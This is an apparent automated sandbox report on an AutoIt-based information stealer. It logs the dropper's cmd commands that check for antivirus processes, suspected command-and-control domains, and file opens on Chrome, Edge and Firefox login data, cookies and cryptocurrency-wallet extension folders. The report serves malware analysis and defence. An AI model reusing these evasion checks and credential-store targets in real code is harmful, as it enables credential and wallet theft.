                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE0D45 SetUnhandledExceptionFilter,10_2_00DE0D45
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00DE0F91

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Appliance.com, 0000000A.00000003.1995184520.0000000004624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                  Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                  Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                  Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                  Source: Appliance.com, 0000000A.00000002.2110637059.00000000003D1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E21B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00E21B4D
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00DC338B
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2BBED SendInput,keybd_event,10_2_00E2BBED
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2ECD0 mouse_event,10_2_00E2ECD0
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 19152Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Bookmarks" Sv Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina MJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\19152\Appliance.com Appliance.com MJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E214AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00E214AE
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E21FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00E21FB0
                  Source: Appliance.com, 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B8F000.00000004.00000800.00020000.00000000.sdmp, Slideshow.0.dr, Appliance.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: Appliance.comBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE0A08 cpuid 10_2_00DE0A08
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E1E5F4 GetLocalTime,10_2_00E1E5F4
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E1E652 GetUserNameW,10_2_00E1E652
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DFBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_00DFBCD2
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                  Source: Appliance.com, 0000000A.00000002.2115264331.000000000430C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115565079.000000000464C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Appliance.com PID: 4504, type: MEMORYSTR
                  Source: Yara matchFile source: 10.2.Appliance.com.3d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                  Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                  Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                  Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: window-state.json
                  Source: Appliance.com, 0000000A.00000002.2115045633.0000000001C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Appliance.com, 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: Appliance.com, 0000000A.00000002.2115264331.00000000042F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
